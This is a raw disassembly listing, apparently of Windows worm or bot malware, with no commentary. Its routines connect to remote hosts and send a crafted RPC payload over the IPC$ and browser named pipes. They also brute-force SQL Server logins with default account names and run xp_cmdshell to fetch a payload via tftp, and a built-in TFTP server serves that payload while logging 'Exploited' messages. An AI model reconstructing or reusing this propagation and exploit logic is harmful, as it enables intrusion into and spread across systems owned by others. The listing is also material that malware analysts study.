mov eax, [ebp+var_8]
add eax, 64h
push esi
push eax
lea eax, [edi-101h]
push eax
call sub_407B70
add [ebp+var_508], 103h
add esp, 0Ch
inc [ebp+var_8]
cmp [ebp+var_8], 8
mov eax, 1010101h
stosw
jl short loc_41A827
push 9
pop ecx
mov eax, 6C6C6C6Ch
lea edi, [ebx+0B41h]
rep stosd
stosb
lea edi, [ebx+0B66h]
mov esi, offset dword_424604
movsd
movsd
lea eax, [ebp+var_390]
movsw
mov esi, ds:dword_41D0A4
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_390]
push eax
lea eax, [ebx+0B70h]
push eax
call sub_407BF0
add esp, 0Ch
push 54Ah
push 6Dh
lea eax, [ebp+var_390]
push eax
call esi ; lstrlen
lea eax, [eax+ebx+0B70h]
push eax
call sub_407B70
add esp, 0Ch
mov eax, ebx
loc_41A8C6: ; CODE XREF: sub_41A5C1+1AE�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=12BCh
sub_41A8D5 proc near ; DATA XREF: .data:004245A8�o
var_133C = byte ptr -133Ch
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_122F = dword ptr -122Fh
var_1228 = word ptr -1228h
var_1226 = word ptr -1226h
var_1224 = dword ptr -1224h
var_1218 = byte ptr -1218h
var_1217 = byte ptr -1217h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-12BCh]
mov eax, 133Ch
call sub_411400
mov eax, dword_423064
xor eax, ebp
mov [ebp+12BCh+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+12BCh+arg_0]
lea edi, [ebp+12BCh+var_133C]
rep movsd
mov esi, 1211h
push esi
lea eax, [ebp+12BCh+var_1217]
push 0
push eax
mov [ebp+12BCh+var_1218], 0
call sub_407B70
mov eax, [ebp+12BCh+var_1238]
add esp, 0Ch
push [ebp+12BCh+var_1234]
mov [ebp+12BCh+var_1228], 2
mov [ebp+12BCh+var_1224], eax
call ds:dword_41D278 ; htons
push 6
push 1
push 2
mov [ebp+12BCh+var_1226], ax
call ds:dword_41D27C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A961
loc_41A95D: ; CODE XREF: sub_41A8D5+A8�j
xor al, al
jmp short loc_41A9C7
; ---------------------------------------------------------------------------
loc_41A961: ; CODE XREF: sub_41A8D5+86�j
push 10h
lea eax, [ebp+12BCh+var_1228]
push eax
push edi
call ds:dword_41D240 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41A97F
loc_41A976: ; CODE XREF: sub_41A8D5+C0�j
push edi
loc_41A977: ; CODE XREF: sub_41A8D5+D7�j
call ds:dword_41D224 ; closesocket
jmp short loc_41A95D
; ---------------------------------------------------------------------------
loc_41A97F: ; CODE XREF: sub_41A8D5+9F�j
push [ebp+12BCh+var_122F]
lea eax, [ebp+12BCh+var_1218]
push eax
call sub_41A5C1
test eax, eax
pop ecx
pop ecx
jz short loc_41A976
push 0
push esi
lea eax, [ebp+12BCh+var_1218]
push eax
push edi
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
push edi
jz short loc_41A977
call ds:dword_41D224 ; closesocket
mov eax, [ebp+12BCh+var_123C]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
loc_41A9C7: ; CODE XREF: sub_41A8D5+8A�j
mov ecx, [ebp+12BCh+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 12BCh
leave
retn
sub_41A8D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9DE proc near ; CODE XREF: sub_413A2D+20C�p
; sub_413A2D+31D�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_3C = dword ptr 44h
arg_40 = byte ptr 48h
arg_4C = dword ptr 54h
arg_50 = byte ptr 58h
arg_54 = byte ptr 5Ch
arg_68 = dword ptr 70h
arg_78 = dword ptr 80h
arg_7C = word ptr 84h
arg_80 = dword ptr 88h
arg_84 = word ptr 8Ch
arg_88 = dword ptr 90h
arg_8C = dword ptr 94h
arg_90 = word ptr 98h
arg_94 = byte ptr 9Ch
arg_98 = dword ptr 0A0h
arg_9C = dword ptr 0A4h
arg_A0 = dword ptr 0A8h
arg_A4 = dword ptr 0ACh
arg_A8 = byte ptr 0B0h
arg_AC = word ptr 0B4h
arg_AE = word ptr 0B6h
arg_B0 = dword ptr 0B8h
arg_B4 = word ptr 0BCh
arg_B6 = word ptr 0BEh
arg_B8 = dword ptr 0C0h
arg_BC = dword ptr 0C4h
arg_C0 = word ptr 0C8h
arg_C2 = byte ptr 0CAh
arg_C4 = byte ptr 0CCh
arg_D4 = dword ptr 0DCh
arg_D8 = byte ptr 0E0h
arg_E8 = dword ptr 0F0h
arg_EC = byte ptr 0F4h
arg_1EC = dword ptr 1F4h
arg_1F0 = dword ptr 1F8h
arg_1F8 = dword ptr 200h
arg_1FD = byte ptr 205h
arg_200 = byte ptr 208h
arg_201 = byte ptr 209h
arg_210 = byte ptr 218h
arg_211 = byte ptr 219h
arg_310 = byte ptr 318h
arg_311 = byte ptr 319h
arg_40C = byte ptr 414h
arg_240C = byte ptr 2414h
arg_4410 = byte ptr 4418h
arg_6410 = dword ptr 6418h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call sub_411400
mov eax, dword_423064
xor eax, esp
mov [esp+arg_6410], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+0Ch+arg_EC]
rep movsd
mov eax, [esp+0Ch+arg_1F0]
push eax
mov [esp+10h+arg_20], eax
call ds:dword_41D260 ; inet_ntoa
xor ebx, ebx
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_4], ebx
loc_41AA2A: ; CODE XREF: sub_41A9DE+722�j
cmp [esp+0Ch+arg_4], 2
ja loc_41B10F
push offset a_ ; "."
push [esp+10h+arg_C]
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41AA9D
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_40C]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+10h+arg_54]
rep stosd
lea eax, [esp+10h+arg_40C]
push offset byte_41EEEE
mov [esp+14h+arg_68], eax
push offset byte_41EEEF
lea eax, [esp+18h+arg_54]
push eax
call sub_402642
test eax, eax
jnz loc_41B10F
loc_41AA9D: ; CODE XREF: sub_41A9DE+69�j
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_240C]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+24h+arg_240C]
push eax
call ds:dword_41D06C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [esp+10h], eax
jz loc_41B10F
push 48h
lea eax, [esp+10h+arg_A4]
push ebx
push eax
call sub_407B70
mov byte ptr [esp+18h+arg_A4], 5
mov byte ptr [esp+18h+arg_A4+1], bl
mov byte ptr [esp+18h+arg_A4+2], 0Bh
mov byte ptr [esp+18h+arg_A4+3], 3
mov dword ptr [esp+18h+arg_A8], 10h
mov [esp+18h+arg_AC], 48h
mov [esp+18h+arg_AE], bx
mov [esp+18h+arg_B0], ebx
mov [esp+18h+arg_B4], 10B8h
mov [esp+18h+arg_B6], 10B8h
mov [esp+18h+arg_B8], ebx
mov [esp+18h+arg_BC], 1
mov [esp+18h+arg_C0], bx
mov [esp+18h+arg_C2], 1
mov esi, offset dword_41F02C
lea edi, [esp+18h+arg_C4]
movsd
movsd
movsd
movsd
mov [esp+18h+arg_D4], 3
mov esi, offset dword_41F040
lea edi, [esp+18h+arg_D8]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+10h+arg_50]
push eax
push 48h
lea eax, [esp+18h+arg_A4]
push eax
push dword ptr [esp+20h]
mov [esp+20h+arg_E8], esi
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_41B105
push ebx
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078 ; ReadFile
call ds:dword_41D108 ; GetTickCount
push eax
call sub_403356
mov edx, 41414141h
mov eax, edx
lea edi, [esp+0Ch+arg_94]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+8+arg_78]
rep stosd
call sub_403363
mov dword ptr [esp+8+arg_94], eax
xor eax, eax
inc eax
cmp [esp+8+arg_8], eax
mov [esp+8+arg_A0], eax
mov [esp+8+arg_9C], ebx
mov [esp+8+arg_98], eax
mov word ptr [esp+8+arg_A4], bx
jnz short loc_41AC5D
mov dword ptr [esp+8+arg_84], eax
mov dword ptr [esp+8+arg_7C], eax
mov [esp+8+arg_88], ebx
jmp short loc_41AC7C
; ---------------------------------------------------------------------------
loc_41AC5D: ; CODE XREF: sub_41A9DE+266�j
cmp [esp+8+arg_8], ebx
jnz short loc_41AC83
mov dword ptr [esp+8+arg_84], esi
mov dword ptr [esp+8+arg_7C], esi
mov [esp+8+arg_88], 2EBh
loc_41AC7C: ; CODE XREF: sub_41A9DE+27D�j
mov [esp+8+arg_80], ebx
loc_41AC83: ; CODE XREF: sub_41A9DE+283�j
call sub_403363
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+8+arg_78], edx
call sub_403363
cdq
idiv esi
mov eax, [esp+8+arg_8]
shl eax, 4
mov edi, dword_424628[eax]
push edi
mov dword ptr [esp+0Ch+arg_90], ebx
mov [esp+0Ch+arg_1C], eax
mov [esp+0Ch+arg_18], edi
inc edx
mov [esp+0Ch+arg_8C], edx
call sub_4036E0
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+8+arg_4], esi
jz loc_41B105
lea eax, [edi-2]
push eax
push 90h
push esi
call sub_407B70
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+14h+arg_1C]
mov eax, dword_424630[eax]
lea edi, [eax+esi]
mov esi, offset dword_42461C
movsd
movsw
add eax, 7
movsb
mov [esp+14h+arg_14], eax
xor eax, eax
mov [esp+14h+arg_200], bl
lea edi, [esp+14h+arg_201]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi
lea eax, [esp+0Ch+arg_311]
push ebx
push eax
mov [esp+14h+arg_310], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+0Ch+arg_211]
push ebx
push eax
mov [esp+14h+arg_210], bl
call sub_407B70
add esp, 0Ch
cmp [esp+8+arg_1FD], bl
jz loc_41ADF3
call sub_419347
test al, al
jnz short loc_41ADDA
push dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_2 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41ADD1: ; CODE XREF: sub_41A9DE+3F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41ADD1
jmp short loc_41AE56
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A9DE+395�j
push 100h
lea esi, [esp+0Ch+arg_210]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41AE60
; ---------------------------------------------------------------------------
loc_41ADF3: ; CODE XREF: sub_41A9DE+388�j
push dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_3 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41AE4F: ; CODE XREF: sub_41A9DE+476�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AE4F
loc_41AE56: ; CODE XREF: sub_41A9DE+3FA�j
sub eax, ecx
mov [esp+eax+8+arg_210], 0
loc_41AE60: ; CODE XREF: sub_41A9DE+413�j
lea eax, [esp+8+arg_210]
push eax
mov esi, offset dword_433950
push esi
call sub_41432A
test eax, eax
pop ecx
pop ecx
mov [esp+8+arg_C], eax
jz loc_41B126
mov edi, offset dword_424614
push edi
push eax
push esi
push 1
mov ebx, offset dword_433AC8
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41AEB4
push edi
push [esp+0Ch+arg_C]
push esi
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz loc_41B126
loc_41AEB4: ; CODE XREF: sub_41A9DE+4BC�j
mov esi, [esp+8+arg_4]
dec eax
push eax
mov eax, [esp+0Ch+arg_14]
add eax, esi
push ebx
push eax
call sub_407BF0
mov eax, [esp+14h+arg_1C]
mov eax, dword_42462C[eax]
add esp, 0Ch
cmp [esp+8+arg_8], 1
jnz short loc_41AF07
mov ecx, dword_433C68
mov [eax+esi], ecx
mov ecx, dword_424644
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, dword_424644
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, dword_424644
mov [eax+0Ch], ecx
jmp short loc_41AF21
; ---------------------------------------------------------------------------
loc_41AF07: ; CODE XREF: sub_41A9DE+4FB�j
cmp [esp+8+arg_8], 0
jnz short loc_41AF21
push 10h
add eax, esi
pop ecx
loc_41AF13: ; CODE XREF: sub_41A9DE+541�j
mov edx, dword_424644
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41AF13
loc_41AF21: ; CODE XREF: sub_41A9DE+527�j
; sub_41A9DE+52E�j
mov edi, [esp+8+arg_18]
add edi, 42h
push edi
call sub_4036E0
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B13C
push edi
push 0
push ebx
call sub_407B70
push 5
pop ecx
lea esi, [esp+14h+arg_94]
mov edi, ebx
rep movsd
mov esi, [esp+14h+arg_18]
mov eax, esi
test eax, eax
mov [esp+14h+arg_C], eax
fild [esp+14h+arg_C]
jge short loc_41AF68
fadd ds:flt_420D38
loc_41AF68: ; CODE XREF: sub_41A9DE+582�j
fmul ds:dbl_420D30
add esp, 4
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
fstp qword ptr [esp]
call sub_403DA0
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
call sub_41C156
and dword ptr [ebx+18h], 0
push esi
push [esp+14h+arg_4]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call sub_407BF0
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41AFAF
; ---------------------------------------------------------------------------
loc_41AFAE: ; CODE XREF: sub_41A9DE+5D3�j
inc eax
loc_41AFAF: ; CODE XREF: sub_41A9DE+5CE�j
test al, 3
jnz short loc_41AFAE
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+8+arg_4]
add eax, 1Ch
lea esi, [esp+0Ch+arg_78]
rep movsd
mov [esp+0Ch+arg_14], eax
call sub_403603
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+8+arg_28]
rep stosd
mov byte ptr [esp+8+arg_28+1], al
mov byte ptr [esp+8+arg_28+2], al
lea edi, [esp+8+arg_40]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov byte ptr [esp+18h+arg_28], 5
mov byte ptr [esp+18h+arg_28+3], 3
mov [esp+18h+arg_2C], 10h
mov word ptr [esp+18h+arg_30+2], si
mov [esp+18h+arg_34], esi
mov word ptr [esp+18h+arg_3C], si
mov word ptr [esp+18h+arg_3C+2], 1Fh
stosd
call ds:dword_41D09C ; CreateEventA
mov dword ptr [esp+8+arg_50], eax
mov byte ptr [esp+0Fh], 0
mov [esp+8+arg_4], esi
loc_41B030: ; CODE XREF: sub_41A9DE+6E4�j
cmp [esp+8+arg_4], 2
jge loc_41B0C8
inc [esp+8+arg_4]
push 1
push 10B8h
push [esp+10h+arg_14]
lea esi, [esp+14h+arg_28]
push ebx
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+30h+arg_0]
rep movsd
call sub_416D6C
add esp, 2Ch
test al, al
jz short loc_41B0C8
cmp dword ptr [esp+8+arg_50], 0
jz short loc_41B0BD
lea eax, [esp+8+arg_40]
push eax
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078 ; ReadFile
test eax, eax
jnz short loc_41B0A2
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz short loc_41B0BD
loc_41B0A2: ; CODE XREF: sub_41A9DE+6B5�j
push 3E8h
push dword ptr [esp+0Ch+arg_50]
call ds:dword_41D07C ; WaitForSingleObject
cmp eax, 102h
jnz short loc_41B0BD
mov byte ptr [esp+0Fh], 1
loc_41B0BD: ; CODE XREF: sub_41A9DE+690�j
; sub_41A9DE+6C2�j ...
cmp byte ptr [esp+0Fh], 0
jz loc_41B030
loc_41B0C8: ; CODE XREF: sub_41A9DE+657�j
; sub_41A9DE+689�j
push [esp+8+arg_0]
mov esi, ds:dword_41D0DC
call esi ; CloseHandle
push ebx
call sub_403603
cmp [esp+10h+arg_4C], 0
pop ecx
jz short loc_41B0E8
push [esp+0Ch+arg_4C]
call esi ; CloseHandle
loc_41B0E8: ; CODE XREF: sub_41A9DE+702�j
cmp byte ptr [esp+0Fh], 0
jnz short loc_41B149
cmp [esp+0Ch+arg_4], 0
jnz short loc_41B10F
mov [esp+0Ch+arg_4], 1
xor ebx, ebx
jmp loc_41AA2A
; ---------------------------------------------------------------------------
loc_41B105: ; CODE XREF: sub_41A9DE+1E5�j
; sub_41A9DE+2F7�j
push [esp+8+arg_0]
call ds:dword_41D0DC ; CloseHandle
loc_41B10F: ; CODE XREF: sub_41A9DE+51�j
; sub_41A9DE+B9�j ...
xor al, al
loc_41B111: ; CODE XREF: sub_41A9DE+7BD�j
mov ecx, [esp+0Ch+arg_6410]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41A9DE+49D�j
; sub_41A9DE+4D0�j
push [esp+8+arg_0]
call ds:dword_41D0DC ; CloseHandle
push [esp+0Ch+arg_0]
loc_41B134: ; CODE XREF: sub_41A9DE+769�j
call sub_403603
pop ecx
jmp short loc_41B10F
; ---------------------------------------------------------------------------
loc_41B13C: ; CODE XREF: sub_41A9DE+555�j
push [esp+8+arg_0]
call ds:dword_41D0DC ; CloseHandle
push esi
jmp short loc_41B134
; ---------------------------------------------------------------------------
loc_41B149: ; CODE XREF: sub_41A9DE+70F�j
push [esp+0Ch+arg_20]
call ds:dword_41D260 ; inet_ntoa
push eax
mov eax, [esp+10h+arg_1EC]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+18h+arg_EC]
push eax
push [esp+1Ch+arg_1F8]
push offset dword_4269BC
call sub_417361
mov eax, [esp+24h+arg_1EC]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+0Fh]
jmp loc_41B111
sub_41A9DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B1A0 proc near ; DATA XREF: .data:0042457C�o
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = byte ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_402630
test ax, ax
jz short loc_41B23A
loc_41B220: ; CODE XREF: sub_41B1A0+AE�j
xor al, al
loc_41B222: ; CODE XREF: sub_41B1A0+CF�j
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B23A: ; CODE XREF: sub_41B1A0+7E�j
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_402624
test ax, ax
jnz short loc_41B220
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_402630
test ax, ax
jz short loc_41B271
loc_41B263: ; CODE XREF: sub_41B1A0+22B�j
push [ebp+0CD8h+var_D34]
push 1
call sub_402636
mov al, bl
jmp short loc_41B222
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A0+C1�j
mov edi, ds:dword_41D260
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B27D: ; CODE XREF: sub_41B1A0+1D0�j
cmp off_424650, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B365
mov esi, [ecx]
mov eax, offset off_424650
loc_41B293: ; CODE XREF: sub_41B1A0+16B�j
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi ; inet_ntoa
push eax
lea eax, [ebp+0CD8h+var_414]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4030B5
lea eax, [ebp+0CD8h+var_414]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B2C3: ; CODE XREF: sub_41B1A0+128�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B2C3
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+var_414]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_40262A
movzx eax, ax
cmp ax, bx
jz short loc_41B30F
cmp ax, 1
jz short loc_41B30F
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:424650h[eax*4]
cmp [eax], ebx
jnz short loc_41B293
jmp short loc_41B365
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B1A0+154�j
; sub_41B1A0+15A�j
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_402630
push dword_4269BC
lea esi, [ebp+0CD8h+var_14]
call sub_418FC6
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_4030B5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_40263C
test ax, ax
jz short loc_41B378
push [ebp+0CD8h+var_D30]
push 3
call sub_402636
loc_41B365: ; CODE XREF: sub_41B1A0+E6�j
; sub_41B1A0+16D�j
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B27D
jmp short loc_41B3BE
; ---------------------------------------------------------------------------
loc_41B378: ; CODE XREF: sub_41B1A0+1B9�j
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi ; inet_ntoa
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax
push [ebp+0CD8h+var_C18]
push offset dword_4269BC
call sub_417361
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B3BE: ; CODE XREF: sub_41B1A0+1D6�j
push [ebp+0CD8h+var_D2C]
push 2
call sub_402636
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B263
sub_41B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3D0 proc near ; DATA XREF: sub_41B5D2+15A�o
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B3F6
loc_41B3EF: ; CODE XREF: sub_41B3D0+42�j
; sub_41B3D0+5D�j ...
push ebx
call ds:dword_41D08C ; ExitThread
loc_41B3F6: ; CODE XREF: sub_41B3D0+1D�j
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B3EF
push offset aRb ; "rb"
push offset dword_4269E8
call sub_4031F4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_228], eax
jz short loc_41B3EF
push eax
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call sub_403AF3
test eax, eax
pop ecx
jnz loc_41B53E
mov esi, ds:dword_41D278
loc_41B454: ; CODE XREF: sub_41B3D0+168�j
push 204h
lea eax, [ebp+var_224]
push ebx
push eax
call sub_407B70
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi ; htons
push 3
mov [ebp+var_222], ax
call esi ; htons
push [ebp+var_228]
mov [ebp+var_224], ax
push 200h
lea eax, [ebp+var_220]
push 1
push eax
call sub_403D7F
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D24C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D25C ; recvfrom
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
push [ebp+var_238]
call ds:dword_41D254 ; htons
cmp ax, 4
jnz loc_41B5BA
push [ebp+var_238+2]
call ds:dword_41D254 ; htons
cmp ax, word ptr [ebp+var_22C]
jnz loc_41B5BA
push [ebp+var_228]
call sub_403AF3
test eax, eax
pop ecx
jz loc_41B454
loc_41B53E: ; CODE XREF: sub_41B3D0+78�j
inc dword_43394C
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
add esp, 0Ch
push dword_43394C
push [ebp+var_14]
call ds:dword_41D260 ; inet_ntoa
push eax
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi
push 0
push offset dword_4269BC
call sub_417361
push esi
call sub_402B9B
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D224 ; closesocket
